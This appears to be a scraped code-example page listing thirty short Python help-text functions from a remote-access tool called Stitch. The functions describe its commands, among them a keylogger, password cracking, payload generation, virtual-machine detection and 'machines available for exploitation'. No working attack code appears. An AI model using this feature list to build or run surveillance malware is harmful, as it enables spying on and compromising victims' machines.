예제 #1
0
def st_help_keylogger():
    st_print(
        "[*] Records keystrokes of the user. Allowing you to view the status, start, stop, and dump the keystokes to screen."
    )
    usage_keylogger()
예제 #2
0
def st_help_touch():
    st_print('[*] Creates a file with no contents.')
    usage_touch()
예제 #3
0
def st_help_upload():
    st_print('[*] Uploads a file/dir to the system.')
    usage_upload()
예제 #4
0
def st_help_stitchgen():
    st_print('[*] Generates stitch payloads based on running OS.')
    usage_stitchgen()
예제 #5
0
def st_help_sudo():
    st_print("[*] Runs the preceding command with admin priveleges.")
    usage_sudo()
예제 #6
0
def st_help_shell():
    st_print('[*] Opens a shell prompt of the requested session.')
    usage_shell()
예제 #7
0
def st_help_ssh():
    st_print('[*] Attempts to open a ssh connection to the requested host.')
    usage_ssh()
예제 #8
0
def st_help_lsmod():
    st_print('[*] Displays list of all installed drivers.')
    usage_lsmod()
예제 #9
0
def st_help_listen():
    st_print('[*] Server binds to given port to listen for connections.')
    usage_listen()
예제 #10
0
def st_help_ls():
    st_print('[*] Displays a list of files and subdirectories in a directory.')
    usage_ls()
예제 #11
0
def usage_crackpassword():
    st_print('[*] Usage: crackpassword\n')
예제 #12
0
def st_help_logintext():
    st_print("[*] Sets the text of the system's login screen.")
    usage_logintext()
예제 #13
0
def st_help_lockscreen():
    st_print("[*] Enters the system's lock screen.")
    usage_lockscreen()
예제 #14
0
def st_help_location():
    st_print("[*] Gives public IP and estimate geo location of the system.")
    usage_location()
예제 #15
0
def st_help_screenshot():
    st_print('[*] Takes a screenshot of the screen.')
    usage_screenshot()
예제 #16
0
def st_help_more():
    st_print('[*] Displays ouput of file path.')
    usage_more()
예제 #17
0
def st_help_sessions():
    st_print('[*] Displays machines available for exploitation.')
    usage_sessions()
예제 #18
0
def st_help_popup():
    st_print("[*] Displays popup box with custom message.")
    usage_popup()
예제 #19
0
def st_help_showkey():
    st_print(
        '[*] Displays the active encrypted AES key used for payload creation.')
    usage_showkey()
예제 #20
0
def st_help_pwd():
    st_print('[*] Displays the name of the current directory.')
    usage_pwd()
예제 #21
0
def st_help_start():
    st_print('[*] Starts the desired file.')
    usage_start()
예제 #22
0
def st_help_pyexec():
    st_print('[*] Runs python script on the system.')
    usage_pyexec()
예제 #23
0
def usage_disableRDP():
    st_print('[*] Usage: disableRDP\n')
예제 #24
0
def st_help_ps():
    st_print('[*] Displays list of all running processes.')
    usage_ps()
예제 #25
0
def st_help_sysinfo():
    st_print('[*] Displays system information.')
    usage_sysinfo()
예제 #26
0
def st_help_scanreg():
    st_print('[*] Display information on Windows Registry.')
    usage_scanreg()
예제 #27
0
def st_help_unhide():
    st_print('[*] Unhides the specified file/dir from the user.')
    usage_unhide()
예제 #28
0
def usage_dir():
    st_print('[*] Usage: dir\n')
예제 #29
0
def st_help_vmscan():
    st_print('[*] Detects if the system is a virtual machine.')
    usage_vmscan()
예제 #30
0
def st_help_ipconfig():
    st_print("[*] Displays the system's IP configuration.")
    usage_ipconfig()